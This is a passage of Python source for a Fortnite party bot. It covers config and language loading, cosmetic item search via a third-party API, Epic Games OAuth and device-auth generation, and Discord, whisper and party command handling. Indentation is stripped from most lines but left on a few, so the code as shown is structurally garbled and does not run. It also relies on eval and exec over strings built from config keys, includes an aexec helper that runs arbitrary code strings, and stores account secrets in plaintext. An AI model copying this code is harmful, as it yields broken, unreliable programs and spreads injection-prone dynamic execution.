"AthenaPet": "Pet",
"AthenaMusicPack": "Music",
"AthenaLoadingScreen": "Loading Screen",
"AthenaDance": "Emote",
"AthenaSpray": "Spray",
"AthenaEmoji": "Emoticon",
"AthenaSkyDiveContrail": "Contrail",
"AthenaPetCarrier": "Pet",
"AthenaToy": "Toy",
"AthenaConsumableEmote": "Emote",
"AthenaBattleBus": "Battle Bus",
"AthenaRewardEventGraphCosmetic": "Outfit",
"AthenaVictoryPose": "Emote"
}
return converter.get(backendType)
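    # Flattens a cosmetics-API style variant list (entries holding a 'channel'
    # and its 'options') into one selectable entry per option, shaped like the
    # payload the set_* variants parameter expects.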
def convert_variant(type_: str, variants: dict) -> List[dict]:
result = []
for variant in variants:
for option in variant['options']:
result.append({"name": option['name'], 'variants': [{'item': type_, 'channel': variant['channel'], 'variant': option['tag']}]})
return result
    def get_device_auth_details() -> dict:
if os.path.isfile(filename):
with open(filename, 'r') as f:
return json.load(f)
return {}
def store_device_auth_details(email: str, details: dict) -> None:
existing = get_device_auth_details()
existing[email.lower()] = details
with open(filename, 'w') as f:
json.dump(existing, f)
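    # Loads JSON trying utf-8 first, then utf-8-sig (BOM) and finally shift_jis,
    # e.g. for files saved by Japanese Windows editors.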
def load_json(filename: str) -> Union[list,dict]:
try:
with open(filename,encoding='utf-8') as f:
data = json.load(f)
except (json.decoder.JSONDecodeError, UnicodeDecodeError):
try:
with open(filename,encoding='utf-8-sig') as f:
data = json.load(f)
except (json.decoder.JSONDecodeError, UnicodeDecodeError):
with open(filename,encoding='shift_jis') as f:
data = json.load(f)
return data
def load_config(client: Optional[fortnitepy.Client] = None) -> bool:
global data
global commands
global replies
try:
data = load_json("config.json")
except json.decoder.JSONDecodeError as e:
send('ボット',f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send('ボット','config.json ファイルの読み込みに失敗しました。正しく書き込めているか確認してください',red,add_d=lambda x:f'>>> {x}')
send('Bot','Failed to load config.json file. Make sure you wrote correctly',red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send('ボット','config.json ファイルが存在しません',red,add_d=lambda x:f'>>> {x}')
send('Bot','config.json file does not exist',red,add_d=lambda x:f'>>> {x}')
return False
if data.get('loglevel','normal') == 'debug':
send('ボット',f'\n{json.dumps(data,ensure_ascii=False,indent=4)}\n',yellow,add_d=lambda x:f'\n```{x}```\n')
for key,tags in config_tags_raw.items():
try:
value = eval(f"data{key}")
except KeyError:
error_config.append(key)
else:
if isinstance(value,dict):
continue
if bool_ in tags:
if not isinstance(value,bool):
error_config.append(key)
elif bool_none in tags:
                    if not isinstance(value,(bool,type(None))):
error_config.append(key)
elif "can_be_multiple" in tags:
if not isinstance(value,list):
if str in tags:
error_config.append(key)
try:
exec(f"data{key} = value.split(',')")
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif int in tags:
error_config.append(key)
try:
exec(f"data{key} = [value]")
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
if not isinstance(value,tags[0]):
error_config.append(key)
try:
exec(f"data{key} = tags[0](value)")
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
checks = [
['fortnite','owner'],
['fortnite','blacklist'],
['fortnite','whitelist'],
['fortnite','invitelist'],
['fortnite','otherbotlist'],
['discord','owner'],
['discord','blacklist'],
['discord','whitelist']
]
for check in checks:
k,k2 = check
try:
for value in data.get(k,{}).get(k2,[]).copy():
if len(str(value)) == 0:
data.get(k,{}).get(k2,[]).remove(value)
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
with open("config.json", 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=4)
def set_default(keys: list, default: Any, func: Optional[Callable] = None) -> None:
text = ""
text2 = ""
for nest,key in enumerate(keys,1):
text += f"['{key}']"
if nest == len(keys):
if isinstance(default,str):
text2 += f".get('''{key}''','''{default}''')"
else:
text2 += f".get('''{key}''',{default})"
else:
text2 += f"['''{key}''']"
if func:
var = func(eval(f"data{text2}"))
exec(f"data{text} = var")
else:
exec(f"data{text} = data{text2}")
set_default(['fortnite'],{})
set_default(['fortnite','outfit'],"")
set_default(['fortnite','outfit_style'],"")
set_default(['fortnite','backpack'],"")
set_default(['fortnite','backpack_style'],"")
set_default(['fortnite','pickaxe'],"")
set_default(['fortnite','pickaxe_style'],"")
set_default(['fortnite','emote'],"")
try:
set_default(['fortnite','privacy'],'public',lambda x: getattr(PartyPrivacy,x.upper()))
except AttributeError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
error_config.append("['fortnite']['privacy']")
set_default(['fortnite','avatar_color'],'#ffffff,#ffffff,#ffffff')
set_default(['discord','channels'],['{name}-command-channel'],lambda x: [i.replace(" ","-").replace(".","-").replace(",","-").replace("--","-").lower() for i in x])
try:
set_default(['discord','status_type'],'playing',lambda x: getattr(discord.ActivityType,x.lower()))
except AttributeError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
error_config.append("['discord']['status_type']")
set_default(['web'],{})
set_default(['web','ip'],'{ip}')
set_default(['web','port'],8080)
set_default(['web','login_required'],False)
set_default(['lang'],'en')
set_default(['caseinsensitive'],False)
set_default(['no-logs'],False)
set_default(['discord-log'],False)
set_default(['search_max'],60)
set_default(['omit-over2000'],False)
set_default(['skip-if-overflow'],False)
set_default(['hide-email'],False)
set_default(['hide-token'],False)
set_default(['hide-webhook'],False)
set_default(['loglevel'],'normal')
if data.get("status",1) == 0:
config_tags["['fortnite']['email']"].append("red")
config_tags["['lang']"].append("red")
if os.getcwd().startswith('/app') or os.getcwd().startswith('/home/runner'):
data['web']['ip']="0.0.0.0"
else:
data['web']['ip'] = data['web']['ip'].format(ip=socket.gethostbyname(socket.gethostname()))
if client:
client.status_ = data['fortnite']['status']
client.whisper = data['fortnite']['whisper']
client.partychat = data['fortnite']['partychat']
client.discord = data['discord']['discord']
client.web = data['web']['web']
client.whisperperfect = data['fortnite']['disablewhisperperfectly']
client.partychatperfect = data['fortnite']['disablepartychatperfectly']
client.discordperfect = data['discord']['disablediscordperfectly']
client.joinmessageenable = data['fortnite']['joinmessageenable']
client.randommessageenable = data['fortnite']['randommessageenable']
client.outfitmimic = data['fortnite']['outfitmimic']
client.backpackmimic = data['fortnite']['backpackmimic']
client.pickaxemimic = data['fortnite']['pickaxemimic']
client.emotemimic = data['fortnite']['emotemimic']
client.outfitlock = data['fortnite']['outfitlock']
client.backpacklock = data['fortnite']['backpacklock']
client.pickaxelock = data['fortnite']['pickaxelock']
client.emotelock = data['fortnite']['emotelock']
client.acceptinvite = data['fortnite']['acceptinvite']
client.acceptfriend = data['fortnite']['acceptfriend']
if error_config:
send('ボット',f'config.json ファイルの読み込みに失敗しました。キーの名前が間違っていないか確認してください。アップデート後の場合は、最新のconfig.jsonファイルを確認してください\n{", ".join(error_config)} がありません',red,add_d=lambda x:f'>>> {x}')
        send('Bot',f'Failed to load config.json file. Make sure the key names are correct. If this is after an update, please check the latest config.json file\n{", ".join(error_config)} is missing',red,add_d=lambda x:f'>>> {x}')
os.makedirs("items/", exist_ok=True)
    def load_lang(lang: str) -> bool:
global localize
try:
localize = load_json(f"lang/{lang}.json")
except json.decoder.JSONDecodeError as e:
send('ボット',f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send('ボット',f'{data["lang"]}.json ファイルの読み込みに失敗しました。正しく書き込めているか確認してください\n',red,add_d=lambda x:f'>>> {x}')
send('Bot',f'Failed to load {data["lang"]}.json file. Make sure you wrote correctly',red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
            send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send('ボット',f'{data["lang"]}.json ファイルが存在しません',red,add_d=lambda x:f'>>> {x}')
send('Bot',f'{data["lang"]}.json file does not exist',red,add_d=lambda x:f'>>> {x}')
return False
return True
if os.path.isfile(f"lang/{data['lang']}.json"):
if not load_lang(data['lang']):
return False
else:
if not load_lang("en"):
return False
color = data['fortnite']['avatar_color'].split(',') if data['fortnite']['avatar_color'] else ""
if len(color) > 2:
background_colors = [color[0], color[1], color[2]]
elif len(color) == 1:
try:
background_colors = eval(f"fortnitepy.KairosBackgroundColorPreset.{color[0]}")
except (AttributeError, SyntaxError):
send(l('bot'),l('color_must_be'))
error_config.append("['fortnite']['avatar_color']")
background_colors = ["#ffffff","#ffffff","#ffffff"]
else:
background_colors = None
data['fortnite']['avatar_color'] = background_colors
try:
commands = load_json("commands.json")
except json.decoder.JSONDecodeError as e:
send(l('bot'),f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_json", "commands.json"),red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_notfound", "commands.json"),red,add_d=lambda x:f'>>> {x}')
return False
if data['loglevel'] == 'debug':
send(l('bot'),f'\n{json.dumps(commands,ensure_ascii=False,indent=4)}\n',yellow,add_d=lambda x:f'\n```{x}```\n')
for key,tags in commands_tags.items():
try:
value = eval(f"commands{key}")
except KeyError:
error_commands.append(key)
else:
if not isinstance(value,list):
try:
exec(f"commands{key} = value.split(',')")
except Exception:
if data["loglevel"] == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
error_commands.append(key)
with open("commands.json", 'w', encoding='utf-8') as f:
json.dump(commands, f, ensure_ascii=False, indent=4)
def set_default_(key: str, default: Any, func: Optional[Callable] = None) -> None:
text = f"['{key}']"
text2 = f".get('{key}','{default}')"
if func:
exec(f"commands{text} = {func}(commands{text2})")
else:
exec(f"commands{text} = commands{text2}")
set_default_("usercommands","")
if error_commands:
send(l('bot'),f'{l("load_failed_keyerror", "commands.json")}\n{l("is_missing", ", ".join(error_commands))}',red,add_d=lambda x:f'>>> {x}')
if data['caseinsensitive']:
commands = {k.lower(): [jaconv.kata2hira(c.lower()) for c in v] for k,v in commands.items()}
flag = True
commands['ownercommands'] = []
if "{all}" in commands['usercommands']:
for command in (list(commands_tags.keys()) + ["cid_","bid_","petcarrier_","pickaxe_id_","eid_","emoji_","toy_","item-search"]):
command = command.replace("['","",1).replace("']","",1)
if command in ["usercommands","true","false","me","privacy_public","privacy_friends_allow_friends_of_friends","privacy_friends","privacy_private_allow_friends_of_friends","privacy_private","info_party"]:
continue
if command in [i.lower() for i in commands['usercommands']]:
commands['ownercommands'].append(command)
else:
for command in (list(commands_tags.keys()) + ["cid_","bid_","petcarrier_","pickaxe_id_","eid_","emoji_","toy_","item-search"]):
command = command.replace("['","",1).replace("']","",1)
if command in ["usercommands","true","false","me","privacy_public","privacy_friends_allow_friends_of_friends","privacy_friends","privacy_private_allow_friends_of_friends","privacy_private","info_party"]:
continue
if command not in [i.lower() for i in commands['usercommands']]:
commands['ownercommands'].append(command)
try:
replies = load_json("replies.json")
except json.decoder.JSONDecodeError as e:
send(l('bot'),f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_json", "replies.json"),red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_notfound", "replies.json"),red,add_d=lambda x:f'>>> {x}')
return False
return True
def get_item_data(lang: str) -> Optional[list]:
res = requests.get("https://benbotfn.tk/api/v1/cosmetics/br", params={"lang": lang})
if res.status_code == 200:
return res.json()
return None
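# NOTE: item metadata comes from the third-party benbotfn.tk API; any
# non-200 response surfaces as None, which store_item_data() skips below.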
def store_item_data(langs: list) -> None:
with ThreadPoolExecutor() as executor:
futures = {executor.submit(get_item_data,lang): lang for lang in langs}
for future in as_completed(futures):
lang = futures[future]
            result = future.result()
            if result is None:  # benbotfn request failed; skip this language
                continue
            data_ = {}
if data["loglevel"] == "debug":
send(l("bot"),f"Saving {lang} items",yellow)
for item in result:
type_ = convert_backend_type(item["backendType"])
if type_ in ignoretype:
continue
if not data_.get(type_):
data_[type_] = []
data_[type_].append(item)
for type_,items in data_.items():
with open(f"items/{type_}_{lang}.json","w",encoding="utf-8") as f:
json.dump(items,f,ensure_ascii=False,indent=4)
if data["loglevel"] == "debug":
send(l("bot"),f"Saved {lang} items",yellow)
def partymember_backpack(member: fortnitepy.party.PartyMemberBase) -> Optional[str]:
asset = member.meta.backpack
result = re.search(r".*\.([^\'\"]*)", asset.strip("'"))
if result and result.group(1) != 'None':
return result.group(1)
def partymember_emote(member: fortnitepy.party.PartyMemberBase) -> Optional[str]:
asset = member.meta.emote
result = re.search(r".*\.([^\'\"]*)", asset.strip("'"))
if result and result.group(1) != 'None':
return result.group(1)
def member_asset(member: fortnitepy.party.PartyMemberBase, asset: str) -> str:
if asset in ("backpack", "pet"):
return partymember_backpack(member)
elif asset in ("emote", "emoji", "toy"):
return partymember_emote(member)
else:
return getattr(member, asset, None)
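# Illustrative mapping: member_asset(member, "pet") goes through the backpack
# meta (pets share the back-bling slot) and "emoji"/"toy" through the emote
# meta; anything else falls back to the member attribute of the same name.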
def search_item(lang: str, mode: str, text: str, type_: Optional[str] = None, cache: Optional[bool] = True) -> Optional[List[dict]]:
itemlist = []
if not cache_items.get(lang):
cache_items[lang] = []
if cache:
if mode == 'set':
data_ = cache_items[lang]
else:
data_ = [i for i in cache_items[lang] if convert_backend_type(i["backendType"]) in type_.split(',')]
else:
        data_ = []
        def _open_file(filename: str) -> Union[list, dict]:
            # shared loader for the per-type item dumps under items/
            with open(filename, 'r', encoding='utf-8') as f:
                return json.load(f)
        if type_ not in ["Item", None]:
            with ThreadPoolExecutor() as executor:
                futures = [executor.submit(_open_file,f'items/{i}_{lang}.json') for i in type_.split(',')]
                for future in futures:
                    data_.extend(future.result())
        else:
            with ThreadPoolExecutor() as executor:
                def _(text: str) -> str:
                    return re.sub(r"items(\\|/)","",text).replace(f"_{lang}.json","")
                futures = [executor.submit(_open_file,f'items/{_(i)}_{lang}.json') for i in glob(f"items/*_{lang}.json") if _(i)[0].isupper()]
                for future in futures:
                    data_.extend(future.result())
for item in data_:
try:
if convert_backend_type(item["backendType"]) in ignoretype or item in itemlist or item.get("name") is None:
continue
if mode == "name":
if data['caseinsensitive']:
text_ = jaconv.hira2kata(text.lower())
name = jaconv.hira2kata(item['name'].lower())
else:
text_ = text
name = item['name']
if text_ in name:
itemlist.append(item)
elif mode == "id":
text_ = text
if text_.lower() in item['id'].lower():
itemlist.append(item)
elif mode == "set":
if not item.get('set'):
continue
if data['caseinsensitive']:
text_ = jaconv.hira2kata(text.lower())
name = jaconv.hira2kata(item['set'].lower())
else:
text_ = text
name = item['set']
if text_ in name:
itemlist.append(item)
except Exception:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),item,red,add_d=lambda x:f'>>> {x}')
if len(itemlist) == 0:
if cache:
return search_item(lang=lang, mode=mode, text=text, type_=type_, cache=False)
else:
return None
else:
if not cache:
for item in itemlist:
if item not in cache_items[lang]:
cache_items[lang].append(item)
return itemlist
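# Illustrative call: search_item("en", "name", "Raider", type_="Outfit")
# checks the in-memory cache first, then re-reads items/Outfit_en.json on a
# miss; None means nothing matched even with the cache bypassed.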
def search_style(lang: str, id_: str, type_: str, cache: Optional[bool] = True) -> Optional[List[dict]]:
if not cache_items.get(lang):
cache_items[lang] = []
if cache:
data_ = cache_items[lang]
else:
data_ = []
if type_ != "Item":
with ThreadPoolExecutor() as executor:
futures = [executor.submit(load_json,f'items/{i}_{lang}.json') for i in type_.split(',')]
for future in futures:
data_.extend(future.result())
else:
with ThreadPoolExecutor() as executor:
def _(text: str) -> str:
return re.sub(r"items(\\|/)","",text).replace(f"_{lang}.json","")
futures = [executor.submit(load_json,f'items/{_(i)}_{lang}.json') for i in glob(f"items/*_{lang}.json") if _(i)[0].isupper()]
for future in futures:
data_.extend(future.result())
variants = None
for item in data_:
if item['id'].lower() == id_.lower():
if item['variants']:
variants = convert_variant(item['backendType'], item['variants'])
break
if not variants:
if cache:
return search_style(lang=lang, id_=id_, type_=type_, cache=False)
else:
return None
else:
if not cache:
if item not in cache_items[lang]:
cache_items[lang].append(item)
return variants
def get_banner_data() -> Optional[dict]:
res = requests.get("https://benbotfn.tk/api/v1/exportAsset?path=FortniteGame/Content/Banners/BannerIcons")
if res.status_code == 200:
return res.json()
return None
def store_banner_data() -> None:
    banners = get_banner_data()
    if banners is None:  # request failed; keep whatever is already on disk
        return
    with open("items/banners.json","w",encoding="utf-8") as f:
        json.dump(banners,f,indent=4,ensure_ascii=False)
def search_banner(id_: str) -> Optional[dict]:
data_ = load_json("items/banners.json")
data_ = {k.lower():v for k,v in data_.items()}
return data_.get(id_.lower())
def restart(sleep_time: Union[int,float] = 0) -> None:
    if sleep_time > 0:
        time.sleep(sleep_time)
    os.execv(sys.executable, ['python', *sys.argv])
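# os.execv replaces the current process image, so nothing after restart()
# runs in the old process; callers reply first, then schedule the restart.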
if True: #Asynchronous functions
async def reply(message: Union[fortnitepy.message.MessageBase, discord.Message, WebMessage], client: fortnitepy.Client, content: str) -> None:
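        """Send content back over whatever transport the message arrived on,
        chunking Discord replies to stay under the 2000-character limit."""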
if isinstance(message, fortnitepy.message.MessageBase):
await message.reply(content)
elif isinstance(message, discord.Message):
if len(content) > 1990:
text = discord.utils.escape_markdown(content).split("\n")
for txt in text:
if len(txt) > 1990:
text = [txt[i:i+1990] for i in range(0, len(txt), 1990)]
for t in text:
await message.channel.send(t)
else:
await message.channel.send(content)
else:
await message.channel.send(content)
elif isinstance(message, WebMessage):
message.reply(content)
elif isinstance(message, AllMessage):
message.reply(content, client)
async def aexec(code: str, variable: dict) -> Any:
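        """Run a (possibly multi-line) code string inside a generated
        `async def __ex(var)` wrapper, then copy any names the snippet
        created or changed back into module globals."""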
def _(text) -> str:
return re.match(r"(\u0020|\u3000)*", text).end() * u"\u0020"
scode = code.split('\n')
delete = len(_(scode[0]))
lines = [i.replace(u"\u0020", "", delete) for i in scode]
exc = (
f'async def __ex(var):'
+ '\n for v in var:'
+ '\n v = var[v]'
+ ''.join(f'\n {l}' for l in lines)
+ '\n for v in locals():'
+ '\n var[v] = locals()[v]'
)
if data['loglevel'] == 'debug':
send(l('bot'),exc,yellow,add_d=lambda x:f'```\n{x}\n```')
exec(exc)
variable_before = variable.copy()
result = await locals()['__ex'](variable)
variable_after = variable.copy()
newvar = {k: v for k,v in variable_after.items() if (k not in variable_before.keys() or v != variable_before.get(k)) and "_" not in k and k not in ("k", "v") and isinstance(k, str)}
for k in newvar:
exc = (
f"global {k}"
+ f"\n{k} = newvar['{k}']"
)
exec(exc)
return result
    async def generate_device_auth_and_store(email: str) -> dict:
global web_text
while True:
send(l('bot'),l('get_code', email))
web_text = l('get_code2', email)
response = await ainput("Data: \n")
if "redirectUrl" in response:
response = json.loads(response)
if "?code" not in response["redirectUrl"]:
send(l('bot'),l('unauthorized'))
continue
code = response["redirectUrl"].split("?code=")[1]
else:
if "https://accounts.epicgames.com/fnauth" in response:
if "?code" not in response:
send(l('bot'),l('unauthorized'))
continue
code = response.split("?code=")[1]
else:
code = response
data = await authorization_code_auth(code)
try:
access_token = data["access_token"]
in_app_id = data["in_app_id"]
except KeyError:
send(l('bot'),l('authorization_expired'))
continue
fortnite_access_token, fortnite_expires_at = await get_fortnite_token(access_token)
user = await lookup_user(in_app_id, fortnite_access_token)
if user["email"].lower() == email.lower():
break
else:
send(l('bot'),l('account_incorrect', user["email"], email))
continue
exchange_code = await exchange(access_token)
launcher_access_token, client_id = await exchange_code_auth(exchange_code)
details = await generate_device_auth(client_id, launcher_access_token)
store_device_auth_details(email.lower(), details)
web_text = ""
return details
async def get_token() -> tuple:
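        """Request a client-credentials token from the launcher OAuth
        endpoint; returns (access_token, expiry as a naive datetime)."""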
async with aiohttp.ClientSession() as session:
data = await session.post(
oauth_url,
headers={
"Authorization": f"basic {launcher_token}"
},
data={
"grant_type": "client_credentials",
"token_type": "eg1"
}
)
data = await data.json()
return data["access_token"], datetime.datetime.fromisoformat(data["expires_at"].replace("Z",""))
async def get_fortnite_token(access_token: str) -> tuple:
exchange_code = await exchange(access_token)
async with aiohttp.ClientSession() as session:
data = await session.post(
fortnite_token_url,
headers={
"Authorization": f"basic {fortnite_token}"
},
data={
"grant_type": "exchange_code",
"token_type": "eg1",
"exchange_code": exchange_code
}
)
data = await data.json()
return data["access_token"], datetime.datetime.fromisoformat(data["expires_at"].replace("Z",""))
    async def authorization_code_auth(authorization_code: str) -> dict:
async with aiohttp.ClientSession() as session:
data = await session.post(
oauth_url,
headers={
"Authorization": f"basic {launcher_token}"
},
data={
"grant_type": "authorization_code",
"code": authorization_code,
"token_type": "eg1"
}
)
return await data.json()
async def exchange_code_auth(exchange_code: str) -> tuple:
async with aiohttp.ClientSession() as session:
data = await session.post(
exchange_auth_url,
headers={
"Authorization": f"basic {launcher_token}"
},
data={
"grant_type": "exchange_code",
"exchange_code": exchange_code,
"token_type": "eg1"
}
)
data = await data.json()
return data["access_token"], data["account_id"]
async def exchange(access_token: str) -> str:
async with aiohttp.ClientSession() as session:
data = await session.get(
exchange_url,
headers={
"Authorization": f"bearer {access_token}"
}
)
data = await data.json()
return data["code"]
async def lookup_user(user_id: str, fortnite_access_token: str) -> dict:
async with aiohttp.ClientSession() as session:
data = await session.get(
user_lookup_url.format(user_id=user_id),
headers={
"Authorization": f"bearer {fortnite_access_token}"
}
)
data = await data.json()
return data
async def generate_device_auth(client_id: str, access_token: str) -> dict:
async with aiohttp.ClientSession() as session:
data = await session.post(
f"https://account-public-service-prod.ol.epicgames.com/account/api/public/account/{client_id}/deviceAuth",
headers={
"Authorization": f"Bearer {access_token}",
"Content-Type": "application/json"
}
)
data = await data.json()
return {"device_id": data["deviceId"], "account_id": data["accountId"], "secret": data["secret"]}
async def run_bot() -> None:
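        """Start every configured fortnitepy client; on bad device auth,
        drop the cached credentials for that account and restart so they
        are regenerated."""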
for client in clients:
client.booting = True
if data.get('restart_in') not in [None, 0]:
Timer(data.get('restart_in'), restart).start()
try:
await fortnitepy.start_multiple(
clients,
all_ready_callback=lambda: send(l("bot"),l("all_login"),green,add_p=lambda x:f'[{now()}] {x}') if len(clients) > 1 else print('')
)
except fortnitepy.AuthException as e:
if data["loglevel"] == "debug":
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if "errors.com.epicgames.account.oauth.exchange_code_not_found" in e.args[0]:
send(l("bot"),l("exchange_code_error"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
elif "Invalid device auth details passed." in e.args[0]:
some_detail = e.args[0].split("-")[0].strip()
device_auth_details = get_device_auth_details()
for email,details in device_auth_details.items():
for detail in details.values():
if detail == some_detail:
break
else:
continue
break
else:
email = some_detail
device_auth_details.pop(email.lower())
with open(filename, 'w') as f:
json.dump(device_auth_details, f)
restart()
else:
send(l("bot"),l("login_failed"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
sys.exit(1)
except fortnitepy.HTTPException as e:
if data["loglevel"] == "debug":
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if "reset" in e.args[0]:
send(l("bot"),l("password_reset_error"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
else:
send(l("bot"),l("login_failed"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
sys.exit(1)
except KeyboardInterrupt:
sys.exit(1)
except Exception:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),l("failed_to_load_account"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
sys.exit(1)
async def run_app() -> None:
try:
await app.create_server(host=data['web']['ip'], port=data['web']['port'], return_asyncio_server=True, access_log=data['web']['log'])
except OSError:
if data["loglevel"] == "debug":
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),l("web_already_running"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
if data["status"] == 0 or bot_ready is False:
webbrowser.open(f"http://{data['web']['ip']}:{data['web']['port']}")
send(l("bot"),l("web_running",f"http://{data['web']['ip']}:{data['web']['port']}"),add_p=lambda x:f'[{now()}] {x}')
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
async def process_command(message: Union[fortnitepy.FriendMessage, fortnitepy.PartyMessage, discord.Message, WebMessage, AllMessage]):
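        """Parse one inbound message (Fortnite whisper/party chat, Discord,
        web panel, or a fan-out AllMessage), apply owner/blacklist/NG-word
        policy, then dispatch the matched command."""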
global blacklist
global whitelist
global blacklist_
global whitelist_
global otherbotlist
if not message or not message.content:
return
loop = asyncio.get_event_loop()
content = message.content
con = content.split("\n")
if data['caseinsensitive']:
args = jaconv.kata2hira(content.lower()).split()
else:
args = content.split()
content_ = ' '.join(args[1:])
content2_ = ' '.join(args[2:])
rawargs = content.split()
rawcontent = ' '.join(rawargs[1:])
rawcontent2 = ' '.join(rawargs[2:])
check_ownercommand = True
check_ng = True
if len(args) < 1:
return
if isinstance(message, fortnitepy.message.MessageBase):
client = message.client
client.add_cache(message.author)
if ((data['discord']['enabled'] and not dclient.isready)
or (message.author.id in blacklist and data['fortnite']['blacklist-ignorecommand'])
or (message.author.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['ignorebot'])):
return
if ((len(con) > 1)
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
if isinstance(message, fortnitepy.FriendMessage):
if not client.whisper:
if client.whisperperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}]',content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} [{platform_to_str(message.author.platform)}] | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
elif isinstance(message, fortnitepy.PartyMessage):
if not client.partychat:
if client.partychatperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
display_name_ = client.is_most()
if display_name_:
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {name(message.author)} | {x}',add_d=lambda x:f'[{l("party")}] [{display_name_}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}]',content,add_p=lambda x:f'[{now()}] [{l("party")}/{client.party.id}] [{display_name_}] {name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}] | {x}',add_d=lambda x:f'[{l("party")}/{client.party.id}] [{display_name_}] {x}')
if content_ in commands['me']:
rawcontent = message.author.id
content_ = message.author.id
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(message, discord.Message):
if ((not isinstance(message.channel, discord.TextChannel))
or (message.author.id == dclient.user.id)
or (message.author.id in blacklist_ and data['discord']['blacklist-ignorecommand'])
or (message.author.bot and data['discord']['ignorebot'])):
return
            if any("{name}" not in i and "{id}" not in i and message.channel.name == i for i in data['discord']['channels']):
tasks = {}
for client_ in loadedclients:
mes = AllMessage(content, message.author, client_, message)
task = loop.create_task(process_command(mes))
tasks[client_] = [task, mes]
await asyncio.gather(*[i[0] for i in tasks.values()])
for client_,list_ in tasks.items():
result = list_[1].result.get(client_.user.id)
if result:
results = '\n'.join(result)
await reply(message, client_, f"[{name(client_.user)}] {results}")
return
else:
for clientname, client in client_name.items():
if not client.isready:
continue
if message.channel.name in [i.format(name=clientname, id=client.user.id).replace(" ","-").replace(".","-").replace(",","-").replace("--","-").lower() for i in data["discord"]["channels"]]:
break
else:
return
if not client.discord:
if client.discordperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist_:
return
if (len(con) > 1
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}({dclient.user})] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}({dclient.user})] {x}')
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in dclient.owner])
